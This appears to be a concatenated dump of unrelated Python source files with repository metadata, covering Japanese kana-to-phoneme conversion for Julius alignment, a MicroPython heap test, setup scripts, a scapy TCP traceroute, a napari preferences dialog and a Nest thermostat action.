s = s.replace('どょ',' dy o')
s = s.replace('どぉ',' d o:')
s = s.replace('にゃ',' ny a')
s = s.replace('にゅ',' ny u')
s = s.replace('にょ',' ny o')
s = s.replace('ひゃ',' hy a')
s = s.replace('ひゅ',' hy u')
s = s.replace('ひょ',' hy o')
s = s.replace('みゃ',' my a')
s = s.replace('みゅ',' my u')
s = s.replace('みょ',' my o')
s = s.replace('りゃ',' ry a')
s = s.replace('りゅ',' ry u')
s = s.replace('りょ',' ry o')
s = s.replace('ぎゃ',' gy a')
s = s.replace('ぎゅ',' gy u')
s = s.replace('ぎょ',' gy o')
s = s.replace('ぢぇ',' j e')
s = s.replace('ぢゃ',' j a')
s = s.replace('ぢゅ',' j u')
s = s.replace('ぢょ',' j o')
s = s.replace('じぇ',' j e')
s = s.replace('じゃ',' j a')
s = s.replace('じゅ',' j u')
s = s.replace('じょ',' j o')
s = s.replace('びゃ',' by a')
s = s.replace('びゅ',' by u')
s = s.replace('びょ',' by o')
s = s.replace('ぴゃ',' py a')
s = s.replace('ぴゅ',' py u')
s = s.replace('ぴょ',' py o')
s = s.replace('うぁ',' u a')
s = s.replace('うぃ',' w i')
s = s.replace('うぇ',' w e')
s = s.replace('うぉ',' w o')
s = s.replace('ふぁ',' f a')
s = s.replace('ふぃ',' f i')
s = s.replace('ふぅ',' f u')
s = s.replace('ふゃ',' hy a')
s = s.replace('ふゅ',' hy u')
s = s.replace('ふょ',' hy o')
s = s.replace('ふぇ',' f e')
s = s.replace('ふぉ',' f o')
    # conversion rules for single kana (one mora each)
s = s.replace('あ',' a')
s = s.replace('い',' i')
s = s.replace('う',' u')
s = s.replace('え',' e')
s = s.replace('お',' o')
s = s.replace('か',' k a')
s = s.replace('き',' k i')
s = s.replace('く',' k u')
s = s.replace('け',' k e')
s = s.replace('こ',' k o')
s = s.replace('さ',' s a')
s = s.replace('し',' sh i')
s = s.replace('す',' s u')
s = s.replace('せ',' s e')
s = s.replace('そ',' s o')
s = s.replace('た',' t a')
s = s.replace('ち',' ch i')
s = s.replace('つ',' ts u')
s = s.replace('て',' t e')
s = s.replace('と',' t o')
s = s.replace('な',' n a')
s = s.replace('に',' n i')
s = s.replace('ぬ',' n u')
s = s.replace('ね',' n e')
s = s.replace('の',' n o')
s = s.replace('は',' h a')
s = s.replace('ひ',' h i')
s = s.replace('ふ',' f u')
s = s.replace('へ',' h e')
s = s.replace('ほ',' h o')
s = s.replace('ま',' m a')
s = s.replace('み',' m i')
s = s.replace('む',' m u')
s = s.replace('め',' m e')
s = s.replace('も',' m o')
s = s.replace('ら',' r a')
s = s.replace('り',' r i')
s = s.replace('る',' r u')
s = s.replace('れ',' r e')
s = s.replace('ろ',' r o')
s = s.replace('が',' g a')
s = s.replace('ぎ',' g i')
s = s.replace('ぐ',' g u')
s = s.replace('げ',' g e')
s = s.replace('ご',' g o')
s = s.replace('ざ',' z a')
s = s.replace('じ',' j i')
s = s.replace('ず',' z u')
s = s.replace('ぜ',' z e')
s = s.replace('ぞ',' z o')
s = s.replace('だ',' d a')
s = s.replace('ぢ',' j i')
s = s.replace('づ',' z u')
s = s.replace('で',' d e')
s = s.replace('ど',' d o')
s = s.replace('ば',' b a')
s = s.replace('び',' b i')
s = s.replace('ぶ',' b u')
s = s.replace('べ',' b e')
s = s.replace('ぼ',' b o')
s = s.replace('ぱ',' p a')
s = s.replace('ぴ',' p i')
s = s.replace('ぷ',' p u')
s = s.replace('ぺ',' p e')
s = s.replace('ぽ',' p o')
s = s.replace('や',' y a')
s = s.replace('ゆ',' y u')
s = s.replace('よ',' y o')
s = s.replace('わ',' w a')
s = s.replace('を',' o')
s = s.replace('ん',' N')
s = s.replace('っ',' q')
s = s.replace('ー',':')
s = s.replace('ぁ',' a')
s = s.replace('ぃ',' i')
s = s.replace('ぅ',' u')
s = s.replace('ぇ',' e')
s = s.replace('ぉ',' o')
s = s.replace('ゎ',' w a')
s = s[1:]
s = re.sub(r':+', ':', s)
return s
def gen_julius_dict_1st(text_symbols: [str], word_phones: [str]) -> str:
    '''Generate the contents of a Julius dict file from text symbols and their phoneme readings
    args:
        text_symbols ([str]): word symbols
            ['今回', 'は']
        word_phones ([str]): phoneme sequence of each word
            ['k o N k a i', 'w a']
    returns:
        (str): contents of the Julius dict file
'''
tmp = []
finit = len(text_symbols)
for i, zipped in enumerate(zip(text_symbols, word_phones)):
tmp.append('{}\t[{}]\t{}'.format(i*2, *zipped))
if i + 1 != finit:
tmp.append('{}\t[{}]\t{}'.format(i*2+1, 'sp_{}'.format(i), 'sp'))
# append sp and Start, End symbol
tmp.append('{}\t[{}]\t{}'.format(i*2+1, '<s>', 'silB'))
tmp.append('{}\t[{}]\t{}'.format((i+1)*2, '</s>', 'silE'))
return '\n'.join(tmp) + '\n'
def gen_julius_dfa(number_of_words: int) -> str:
    '''Generate the contents of a Julius dfa file (word transitions) from the number of words
    args:
        number_of_words (int): number of words to chain
    returns:
        (str): contents of the Julius dfa file
'''
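    # chain the word ids into a linear DFA, walking them from last to first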
i = 0
current_word = number_of_words - 3
isLast = False
tmp = []
while True:
if i == 0:
tmp.append('{} {} {} {} {}'.format(i, number_of_words - 1, i + 1, 0, 1))
i += 1
elif i > 0 and not isLast:
tmp.append('{} {} {} {} {}'.format(i, current_word, i + 1, 0, 0))
current_word -= 1
isLast = current_word == -1
i += 1
elif i > 0 and isLast:
tmp.append('{} {} {} {} {}'.format(i, i - 1, i + 1, 0, 0))
tmp.append('{} {} {} {} {}'.format(i + 1, -1, -1, 1, 0))
break
return '\n'.join(tmp) + '\n'
def gen_julius_dict_2nd(phone_seqence: str) -> str:
    '''Generate the contents of a dict file for forced alignment from a phoneme sequence
    args:
        phone_seqence (str):
            'k o N k a i w a '
    returns:
        (str): contents of the Julius dict file
'''
return '\n'.join([
'0\t[w_0]\tsilB',
'1\t[w_1]\t{}'.format(phone_seqence),
'2\t[w_2]\tsilE',
]) + '\n'
def gen_julius_aliment_dfa() -> str:
    '''Generate the contents of a dfa file for forced alignment
    returns:
        (str): contents of the Julius dfa file
'''
return '\n'.join([
'0 2 1 0 1',
'1 1 2 0 0',
'2 0 3 0 0',
'3 -1 -1 1 0'
]) + '\n'
def julius_sp_insert(target_wav_file: str, aliment_file_signiture: str, model_path: str = None) -> [str]:
julius_args = {
'-h': str(
JULIUS_ROOT / 'model' / 'phone_m' / 'jnas-mono-16mix-gid.binhmm'
) if model_path is None else model_path,
'-input': 'file',
'-debug':'',
'-gram': aliment_file_signiture,
}
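    # julius runs with '-input file' and reads the wav path from stdin, so it is piped in via echo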
file_echo_p = subprocess.Popen(['echo', target_wav_file], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
julius_p = subprocess.Popen(' '.join([str(JULIUS_ROOT / 'bin' / get_os_dependent_directory() / get_os_dependent_exec()),
*list(chain.from_iterable([[k, v] for k, v in julius_args.items()]))]).split(), stdin=file_echo_p.stdout, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
file_echo_p.stdout.close()
return julius_p.communicate()[0].decode('utf-8').split('\n')
def get_sp_inserted_text(raw_output: str, debug_symbol='') -> (str, [int]):
    '''Get the text with short pauses (sp) inserted and the sp indices from the decoding result
    args:
        raw_output: output of `julius_sp_insert`
    returns:
        Tuple(str, [int]): decoded text and the indices of the inserted sp tokens
'''
r = re.compile('<s> (.*) </s>')
pass1_best = next(s for s in raw_output if s.startswith('pass1_best'))
matched = r.search(pass1_best)
if matched is None:
logger.warning('Failed Decoding Text [{}]'.format(debug_symbol))
raise Exception("Decode Failed")
return (re.sub('sp_[\d+]', '<sp>', matched.group(1)), [int(s.split('_')[1]) for s in matched.group().split() if 'sp_' in s])
def get_sp_inserterd_phone_seqence(raw_output: str, debug_symbol='') -> str:
pass1_best_phonemeseq = next(s for s in raw_output if s.startswith('pass1_best_phonemeseq'))
complete_re = re.compile('silB \| (.*) \| silE')
failed_re_1 = re.compile('silE \| (.*) \| silB')
failed_re_2 = re.compile('silE \| (.*)')
if complete_re.search(pass1_best_phonemeseq) is not None:
matched = complete_re.search(pass1_best_phonemeseq)
elif failed_re_1.search(pass1_best_phonemeseq) is not None:
logger.info('Use not correct re to generate Phoneseq [{}]'.format(debug_symbol))
matched = failed_re_1.search(pass1_best_phonemeseq)
elif failed_re_2.search(pass1_best_phonemeseq) is not None:
logger.info('Use not correct re to generate Phoneseq [{}]'.format(debug_symbol))
matched = failed_re_2.search(pass1_best_phonemeseq)
else:
logger.warning('Failed Generate Phoneseq [{}]'.format(debug_symbol))
raise Exception("Decode Failed")
tmp = matched.group(1)
return ' '.join([s.strip() for s in tmp.split('|')])
def julius_phone_alignment(target_wav_file: str, aliment_file_signiture: str, model_path: str = None) -> [str]:
julius_args = {
'-h': str(
JULIUS_ROOT / 'model' / 'phone_m' / 'jnas-mono-16mix-gid.binhmm'
) if model_path is None else model_path,
'-palign':'',
'-input': 'file',
'-gram': aliment_file_signiture,
}
file_echo_p = subprocess.Popen(['echo', target_wav_file], stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
julius_p = subprocess.Popen(' '.join([str(JULIUS_ROOT / 'bin'/ get_os_dependent_directory() / get_os_dependent_exec()),
*list(chain.from_iterable([[k, v] for k, v in julius_args.items()]))]).split(), stdin=file_echo_p.stdout, stdout=subprocess.PIPE, stderr=subprocess.DEVNULL)
file_echo_p.stdout.close()
return julius_p.communicate()[0].decode('utf-8').split('\n')
def get_time_alimented_list(raw_output: str) -> [str]:
r = re.compile('\[\s*(\d+)\s+(\d+)\s*\]\s*[\-]*[\d,\.]+\s*([\w,\:]+)$')
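    # '-palign' lines look like '[ start end ] score phone'; capture start frame, end frame and phone label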
return [
(s.group(1), s.group(2), s.group(3))
for s in map(lambda x: r.search(x), raw_output) if s is not None
]
| 31.501946 | 184 | 0.494998 |
79461f999afead30fb25659ee6f567622c8078e5 | 1,300 | py | Python | tests/micropython/heapalloc_iter.py | PappaPeppar/micropython | ace9fb54053c29574bdf81ffacc5ddcf9d4b45d9 | [
"MIT"
] | 692 | 2016-12-19T23:25:35.000Z | 2022-03-31T14:20:48.000Z | tests/micropython/heapalloc_iter.py | PappaPeppar/micropython | ace9fb54053c29574bdf81ffacc5ddcf9d4b45d9 | [
"MIT"
] | 259 | 2016-12-25T06:38:22.000Z | 2022-03-13T16:38:36.000Z | tests/micropython/heapalloc_iter.py | PappaPeppar/micropython | ace9fb54053c29574bdf81ffacc5ddcf9d4b45d9 | [
"MIT"
] | 228 | 2016-12-19T05:03:30.000Z | 2022-03-22T18:13:00.000Z | # test that iterating doesn't use the heap
try:
import array
except ImportError:
print("SKIP")
raise SystemExit
try:
from micropython import heap_lock, heap_unlock
except (ImportError, AttributeError):
heap_lock = heap_unlock = lambda:0
def do_iter(l):
for i in l:
print(i)
def gen_func():
yield 1
yield 2
# pre-create collections to iterate over
ba = bytearray(b'123')
ar = array.array('H', (123, 456))
t = (1, 2, 3)
l = [1, 2]
d = {1:2}
s = set((1,))
fs = frozenset((1,))
g1 = (100 + x for x in range(2))
g2 = gen_func()
# test containment (both success and failure) with the heap locked
heap_lock()
print(49 in b'123', 255 in b'123')
print(1 in t, -1 in t)
print(1 in l, -1 in l)
print(1 in d, -1 in d)
print(1 in s, -1 in s)
heap_unlock()
# test unpacking with the heap locked
unp0 = unp1 = unp2 = None # preallocate slots for globals
heap_lock()
unp0, unp1, unp2 = t
print(unp0, unp1, unp2)
heap_unlock()
# test certain builtins with the heap locked
heap_lock()
print(all(t))
print(any(t))
print(min(t))
print(max(t))
print(sum(t))
heap_unlock()
# test iterating over collections with the heap locked
heap_lock()
do_iter(b'123')
do_iter(ba)
do_iter(ar)
do_iter(t)
do_iter(l)
do_iter(d)
do_iter(s)
do_iter(fs)
do_iter(g1)
do_iter(g2)
heap_unlock()
| 18.571429 | 66 | 0.678462 |
79461fc621a75c74e9ab55822f88c144a79102d9 | 1,187 | py | Python | setup.py | juztin/flask-tracy | 8a43094f0fced3c216f7b65ad6c5c7a22c14ea25 | [
"BSD-2-Clause"
] | null | null | null | setup.py | juztin/flask-tracy | 8a43094f0fced3c216f7b65ad6c5c7a22c14ea25 | [
"BSD-2-Clause"
] | null | null | null | setup.py | juztin/flask-tracy | 8a43094f0fced3c216f7b65ad6c5c7a22c14ea25 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
from setuptools import setup, find_packages
with open('README.rst') as file:
readme = file.read()
setup(
name='Flask-Tracy',
version='0.1.3',
url='https://github.com/juztin/flask-tracy',
license='BSD',
author='Justin Wilson',
author_email='[email protected]',
description='Logs tracing information on a per-request basis',
long_description=readme,
packages=find_packages(),
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=[
'Flask>=0.9',
],
classifiers=[
"Development Status :: 4 - Beta",
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3 :: Only",
'Topic :: Internet :: WWW/HTTP :: Dynamic Content',
'Topic :: Software Development :: Libraries :: Python Modules'
]
)
| 28.95122 | 70 | 0.612468 |
794620094d364f22c6bc531996eff70265d3a0f8 | 489 | py | Python | package/cloudshell/cp/aws/models/ami_deployment_model.py | QualiSystemsLab/AWS-Shell | bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb | [
"0BSD"
] | 1 | 2021-05-28T13:55:54.000Z | 2021-05-28T13:55:54.000Z | package/cloudshell/cp/aws/models/ami_deployment_model.py | QualiSystemsLab/AWS-Shell-ext | bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb | [
"0BSD"
] | null | null | null | package/cloudshell/cp/aws/models/ami_deployment_model.py | QualiSystemsLab/AWS-Shell-ext | bf7b62640d8d97a5e9199edb7a1ada0b98aac6fb | [
"0BSD"
] | null | null | null |
class AMIDeploymentModel(object):
def __init__(self):
self.aws_ami_id = '' # type: str
self.min_count = 0 # type: int
self.max_count = 0 # type: int
self.instance_type = '' # type: str
self.private_ip_address = '' # type: str
self.security_group_ids = [] # type: list[str]
self.block_device_mappings = [] # type: list[dict]
self.network_interfaces = [] # type: list[dict]
self.aws_key = '' # type: str
| 34.928571 | 59 | 0.576687 |
7946206fa390ea0f32240ce7ff6d529c7a83a5fb | 2,386 | py | Python | tests/rbac/common/role/propose_task_helper_test.py | kthblmfld/sawtooth-next-directory | 57291f1a7e6ce1dfc11a9c5e2930e8c5ebd31707 | [
"Apache-2.0"
] | null | null | null | tests/rbac/common/role/propose_task_helper_test.py | kthblmfld/sawtooth-next-directory | 57291f1a7e6ce1dfc11a9c5e2930e8c5ebd31707 | [
"Apache-2.0"
] | null | null | null | tests/rbac/common/role/propose_task_helper_test.py | kthblmfld/sawtooth-next-directory | 57291f1a7e6ce1dfc11a9c5e2930e8c5ebd31707 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
"""Test Propose Role Task Helper"""
# pylint: disable=no-member
import logging
import pytest
from rbac.common import protobuf
from rbac.common.crypto.keys import Key
from tests.rbac.common import helper
LOGGER = logging.getLogger(__name__)
@pytest.mark.role
@pytest.mark.library
def test_id():
"""Test get a random proposal id"""
id1 = helper.role.task.propose.id()
id2 = helper.role.task.propose.id()
assert isinstance(id1, str)
assert isinstance(id2, str)
assert len(id1) == 24
assert len(id2) == 24
assert id1 != id2
@pytest.mark.role
@pytest.mark.library
def test_reason():
"""Test get a random reason"""
reason1 = helper.role.task.propose.reason()
reason2 = helper.role.task.propose.reason()
assert isinstance(reason1, str)
assert isinstance(reason2, str)
assert len(reason1) > 4
assert len(reason2) > 4
assert reason1 != reason2
@pytest.mark.role
@pytest.mark.integration
def test_create():
"""A role owner creates an add role task proposal
to add a task to their role"""
proposal, role, role_owner, role_owner_key, task, task_owner, task_owner_key = (
helper.role.task.propose.create()
)
assert isinstance(proposal, protobuf.proposal_state_pb2.Proposal)
assert isinstance(role, protobuf.role_state_pb2.RoleAttributes)
assert isinstance(task, protobuf.task_state_pb2.TaskAttributes)
assert isinstance(role_owner, protobuf.user_state_pb2.User)
assert isinstance(task_owner, protobuf.user_state_pb2.User)
assert isinstance(role_owner_key, Key)
assert isinstance(task_owner_key, Key)
assert proposal.object_id == role.role_id
assert proposal.related_id == task.task_id
| 33.138889 | 84 | 0.713747 |
7946207d02c3bff3ce4ad8aafe7d662a0b52670a | 2,857 | py | Python | scapy/trace.py | mmmonk/crap | 96ba81723f043503e7ed2f96ea727b524d22b83f | [
"MIT"
] | 14 | 2015-01-14T15:53:22.000Z | 2019-06-21T06:15:47.000Z | scapy/trace.py | mmmonk/crap | 96ba81723f043503e7ed2f96ea727b524d22b83f | [
"MIT"
] | 1 | 2018-04-01T08:40:17.000Z | 2020-06-24T10:05:33.000Z | scapy/trace.py | mmmonk/crap | 96ba81723f043503e7ed2f96ea727b524d22b83f | [
"MIT"
] | 12 | 2015-05-13T10:52:04.000Z | 2020-10-07T14:49:37.000Z | #!/usr/bin/env python
# $Id$
"""
Author: <m.lukaszuk(at)gmail.com> 2009
TCP trace route using scapy :)
"""
from scapy.all import conf,IP,TCP,sr1,sniff,send
conf.verb = 0
import random
import re
import sys
my_ttl = 1
target = sys.argv[1]
my_dport = 80
my_seq = random.randint(1024,65500)
my_sport = my_seq
def dec2bin(a,b):
'''
    appends the binary digits of a to the list b, least-significant bit first
    (and the question is why it took until release 2.6 of python to realize that
    some people actually use binary numbers)
'''
if a == 0:
return 0
else:
b.append(a % 2)
dec2bin((int)(a / 2),b)
def TCPflags(a):
'''
    returns the set TCP flags as a compact string, e.g. "SA" for SYN/ACK
'''
flags = ['F','S','R','P','A','U','E','C']
tcpflags = []
dec2bin(a,tcpflags)
retval=""
i = 0
for val in tcpflags:
if val == 1:
retval = retval+flags[i]
i = i+1
return retval
ip = IP(dst = target)
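# TCP three-way handshake: send a SYN and wait for the target's SYN/ACK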
res = sr1(ip/TCP(sport = my_sport, dport = my_dport, flags = "S", seq = my_seq),retry = 3,timeout = 2)
my_seq = my_seq+1
my_ack = res.seq+1
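# complete the handshake by ACKing the server's initial sequence number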
send(ip/TCP(sport = my_sport, dport = my_dport, flags = "A", seq = my_seq, ack = my_ack))
dttl = res.ttl
dst = res.src
print "got back TCP flags %s and TTL %d from target %s" % (TCPflags(res.payload.flags),dttl,dst)
ttldiff = 255
for defttl in [64,128,255]:
tmp = defttl-dttl
if tmp > 0 and tmp < ttldiff:
ttldiff = tmp
print "%s is probably %d hops away (at least one way ;))" % (dst,ttldiff+1)
data = "GET / HTTP/1.0\nHost: "+target+"\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2\nAccept: text/html,application/xhtml+xml,application/xml;q = 0.9,*/*;q = 0.8\nAccept-Language: en-us,en;q = 0.5\n"
res = sr1(ip/TCP(sport = my_sport, dport = my_dport, flags = "PA", seq = my_seq, ack = my_ack)/data,retry = 3,timeout = 2)
my_ack = res.seq
my_seq = my_seq+len(data)
data = "Accept-Charset: ISO-8859-2,utf-8;q = 0.7,*;q = 0.7\nPragma: no-cache\nCache-Control: no-cache\n\n"
while 1 == 1:
ip.ttl = my_ttl
rcv = sr1(ip/TCP(sport = my_sport, dport = my_dport, flags = "A", seq = my_seq, ack = my_ack)/data,retry = 2,timeout = 1)
if rcv:
print "%2d : %15s rcv proto %s, TTL %3d" % (my_ttl,rcv.src,rcv.proto,rcv.ttl)
if rcv.proto == 6:
if dttl != rcv.ttl:
print "Probable SYN proxy, SA TTL %d, now TTL %d" % (dttl,rcv.ttl)
print "done, got: TCP flags: %s" % TCPflags(rcv.payload.flags)
if len(rcv.payload.payload) < 10:
cap = sniff(filter = "tcp and port 80 and port %d and host %s" % (my_sport,dst), count = 1,timeout = 5)
for tmp in cap:
if tmp.payload.proto == 6 and len(tmp.payload.payload.payload) < 10:
rcv = tmp.payload
break
if rcv.len > 128:
header = str(rcv.payload.payload)
header = (re.split('\n\s*\n',header,2))[0]
print "\n%s" % header
# rcv.display()
break
if my_ttl > 25:
print "out of TTL ;)"
break
else:
print "%2d : ???.???.???.???" % my_ttl
my_ttl = my_ttl+1
| 25.061404 | 249 | 0.630032 |
794620e9e14ef7b607d1a37b1b9f632aa7b2800b | 7,929 | py | Python | napari/_qt/dialogs/preferences_dialog.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | [
"BSD-3-Clause"
] | null | null | null | napari/_qt/dialogs/preferences_dialog.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | [
"BSD-3-Clause"
] | null | null | null | napari/_qt/dialogs/preferences_dialog.py | Zac-HD/napari | 102a7e8f845893c874d2b86f9371d41130100b89 | [
"BSD-3-Clause"
] | null | null | null | import json
from qtpy.QtCore import QSize, Signal
from qtpy.QtWidgets import (
QDialog,
QHBoxLayout,
QLabel,
QListWidget,
QPushButton,
QStackedWidget,
QVBoxLayout,
QWidget,
)
from ..._vendor.qt_json_builder.qt_jsonschema_form import WidgetBuilder
from ...utils.settings import SETTINGS
from ...utils.translations import trans
class PreferencesDialog(QDialog):
"""Preferences Dialog for Napari user settings."""
resized = Signal(QSize)
def __init__(self, parent=None):
super().__init__(parent)
self._list = QListWidget(self)
self._stack = QStackedWidget(self)
self._list.setObjectName("Preferences")
# Set up buttons
self._button_cancel = QPushButton(trans._("Cancel"))
self._button_ok = QPushButton(trans._("OK"))
self._default_restore = QPushButton(trans._("Restore defaults"))
# Setup
self.setWindowTitle(trans._("Preferences"))
# Layout
left_layout = QVBoxLayout()
left_layout.addWidget(self._list)
left_layout.addStretch()
left_layout.addWidget(self._default_restore)
left_layout.addWidget(self._button_cancel)
left_layout.addWidget(self._button_ok)
main_layout = QHBoxLayout()
main_layout.addLayout(left_layout, 1)
main_layout.addWidget(self._stack, 3)
self.setLayout(main_layout)
# Signals
self._list.currentRowChanged.connect(
lambda index: self._stack.setCurrentIndex(index)
)
self._button_cancel.clicked.connect(self.on_click_cancel)
self._button_ok.clicked.connect(self.on_click_ok)
self._default_restore.clicked.connect(self.restore_defaults)
# Make widget
self.make_dialog()
self._list.setCurrentRow(0)
def resizeEvent(self, event):
"""Override to emit signal."""
self.resized.emit(event.size())
super().resizeEvent(event)
def make_dialog(self):
"""Removes settings not to be exposed to user and creates dialog pages."""
# Because there are multiple pages, need to keep a list of values sets.
self._values_orig_set_list = []
self._values_set_list = []
for _key, setting in SETTINGS.schemas().items():
schema = json.loads(setting['json_schema'])
# Need to remove certain properties that will not be displayed on the GUI
properties = schema.pop('properties')
model = setting['model']
values = model.dict()
napari_config = getattr(model, "NapariConfig", None)
if napari_config is not None:
for val in napari_config.preferences_exclude:
properties.pop(val)
values.pop(val)
schema['properties'] = properties
self._values_orig_set_list.append(set(values.items()))
self._values_set_list.append(set(values.items()))
# Only add pages if there are any properties to add.
if properties:
self.add_page(schema, values)
def restore_defaults(self):
"""Launches dialog to confirm restore settings choice."""
widget = ConfirmDialog(
parent=self,
text=trans._("Are you sure you want to restore default settings?"),
)
widget.valueChanged.connect(self._reset_widgets)
widget.exec_()
def _reset_widgets(self):
"""Deletes the widgets and rebuilds with defaults."""
self.close()
self._list.clear()
for n in range(self._stack.count()):
widget = self._stack.removeWidget(self._stack.currentWidget())
del widget
self.make_dialog()
self._list.setCurrentRow(0)
self.show()
def on_click_ok(self):
"""Keeps the selected preferences saved to SETTINGS."""
self.close()
def on_click_cancel(self):
"""Restores the settings in place when dialog was launched."""
# Need to check differences for each page.
for n in range(self._stack.count()):
# Must set the current row so that the proper set list is updated
# in check differences.
self._list.setCurrentRow(n)
self.check_differences(
self._values_orig_set_list[n],
self._values_set_list[n],
)
self._list.setCurrentRow(0)
self.close()
def add_page(self, schema, values):
"""Creates a new page for each section in dialog.
Parameters
----------
schema : dict
Json schema including all information to build each page in the
preferences dialog.
values : dict
Dictionary of current values set in preferences.
"""
widget = self.build_page_dialog(schema, values)
self._list.addItem(schema["title"])
self._stack.addWidget(widget)
def build_page_dialog(self, schema, values):
"""Builds the preferences widget using the json schema builder.
Parameters
----------
schema : dict
Json schema including all information to build each page in the
preferences dialog.
values : dict
Dictionary of current values set in preferences.
"""
builder = WidgetBuilder()
form = builder.create_form(schema, {})
# set state values for widget
form.widget.state = values
form.widget.on_changed.connect(
lambda d: self.check_differences(
set(d.items()),
self._values_set_list[self._list.currentIndex().row()],
)
)
return form
def check_differences(self, new_set, values_set):
"""Changes settings in settings manager with changes from dialog.
Parameters
----------
new_set : set
The set of new values, with tuples of key value pairs for each
setting.
values_set : set
The old set of values.
"""
page = self._list.currentItem().text().split(" ")[0].lower()
different_values = list(new_set - values_set)
if len(different_values) > 0:
# change the values in SETTINGS
for val in different_values:
try:
setattr(SETTINGS._settings[page], val[0], val[1])
self._values_set_list[
self._list.currentIndex().row()
] = new_set
except: # noqa: E722
continue
class ConfirmDialog(QDialog):
"""Dialog to confirms a user's choice to restore default settings."""
valueChanged = Signal(bool)
def __init__(
self,
parent: QWidget = None,
text: str = "",
):
super().__init__(parent)
# Set up components
self._question = QLabel(self)
self._button_restore = QPushButton(trans._("Restore"))
self._button_cancel = QPushButton(trans._("Cancel"))
# Widget set up
self._question.setText(text)
# Layout
button_layout = QHBoxLayout()
button_layout.addWidget(self._button_cancel)
button_layout.addWidget(self._button_restore)
main_layout = QVBoxLayout()
main_layout.addWidget(self._question)
main_layout.addLayout(button_layout)
self.setLayout(main_layout)
# Signals
self._button_cancel.clicked.connect(self.on_click_cancel)
self._button_restore.clicked.connect(self.on_click_restore)
def on_click_cancel(self):
"""Do not restore defaults and close window."""
self.close()
def on_click_restore(self):
"""Restore defaults and close window."""
SETTINGS.reset()
self.valueChanged.emit(True)
self.close()
| 31.589641 | 85 | 0.607517 |
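The check_differences method above spots changed settings by diffing sets of (key, value) pairs from before and after an edit. The same pattern in isolation, using plain dicts rather than napari's settings objects:
old = {"theme": "dark", "font_size": 12, "autosave": True}
new = {"theme": "light", "font_size": 12, "autosave": True}
changed = set(new.items()) - set(old.items())  # items present only in the new state
for key, value in changed:
    print(f"setting {key!r} changed to {value!r}")  # setting 'theme' changed to 'light'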
7946215731e9eb73a53d7891f19f41abb09e211f | 1,084 | py | Python | actions/set_temperature.py | cognifloyd/stackstorm-nest | 43780edf4e13c8bf8996bf20edc04a40aef1caae | [
"Apache-2.0"
] | 164 | 2015-01-17T16:08:33.000Z | 2021-08-03T02:34:07.000Z | actions/set_temperature.py | cognifloyd/stackstorm-nest | 43780edf4e13c8bf8996bf20edc04a40aef1caae | [
"Apache-2.0"
] | 442 | 2015-01-01T11:19:01.000Z | 2017-09-06T23:26:17.000Z | actions/set_temperature.py | cognifloyd/stackstorm-nest | 43780edf4e13c8bf8996bf20edc04a40aef1caae | [
"Apache-2.0"
] | 202 | 2015-01-13T00:37:40.000Z | 2020-11-07T11:30:10.000Z | from lib import actions
class SetTemperatureAction(actions.BaseAction):
def run(self, scale, structure=None, device=None, temp=None, temp_low=None, temp_high=None):
temperature = None
mode = None
# Assume temp if a range is not provided
if temp_low and temp_high:
temperature = (self._convert_temperature(temp_low, scale),
self._convert_temperature(temp_high, scale))
# Automatically flip the mode to 'range' to accept the range temp
mode = 'range'
else:
temperature = self._convert_temperature(temp, scale)
if structure and device:
nest = self._get_device(structure, device)
if mode:
nest.mode = mode
nest.temperature = temperature
else:
for structure in self._nest.structures:
for device in structure.devices:
if mode:
device.mode = mode
device.temperature = temperature
return temperature
| 34.967742 | 96 | 0.581181 |
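The run method above prefers a (low, high) pair when both bounds are supplied and flips the thermostat into 'range' mode, otherwise it falls back to the single setpoint. A small sketch of just that selection logic, independent of the Nest client (the function and return shape here are illustrative):
def select_temperature(temp=None, temp_low=None, temp_high=None):
    # prefer an explicit range; otherwise use the single setpoint and leave the mode alone
    if temp_low is not None and temp_high is not None:
        return (temp_low, temp_high), "range"
    return temp, None
print(select_temperature(temp=21))                    # (21, None)
print(select_temperature(temp_low=19, temp_high=23))  # ((19, 23), 'range')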
794622f56774cfa1a43648f82c76f4a033cfb786 | 581 | py | Python | bakkes_rcon/types.py | theY4Kman/bakkes-rcon | 99fad6d56b7538dc600ca5ee0deba47416429863 | [
"MIT"
] | 2 | 2021-11-11T17:20:11.000Z | 2022-01-31T22:05:55.000Z | bakkes_rcon/types.py | theY4Kman/bakkes-rcon | 99fad6d56b7538dc600ca5ee0deba47416429863 | [
"MIT"
] | null | null | null | bakkes_rcon/types.py | theY4Kman/bakkes-rcon | 99fad6d56b7538dc600ca5ee0deba47416429863 | [
"MIT"
] | null | null | null | from typing import Literal, TypeAlias, TypedDict
RawOptionalStr: TypeAlias = str | Literal['none']
RawBool: TypeAlias = Literal['true', 'false']
class RawInventoryItem(TypedDict):
product_id: int
name: str
slot: str
paint: RawOptionalStr
certification: RawOptionalStr
certification_value: int
rank_label: RawOptionalStr
quality: str
crate: str
amount: int # seems to only ever be 1
instance_id: int
special_edition: RawOptionalStr
blueprint_item_id: int
blueprint_item: str
blueprint_cost: int
tradeable: RawBool
| 24.208333 | 49 | 0.717728 |
7946232d31b7065f58fb729034a9f8bcb98900b0 | 13,778 | py | Python | test/map/test_core.py | dataframing/snorkel | be6cec76f6758ed6f8d0ca5da7342af28ad5486c | [
"Apache-2.0"
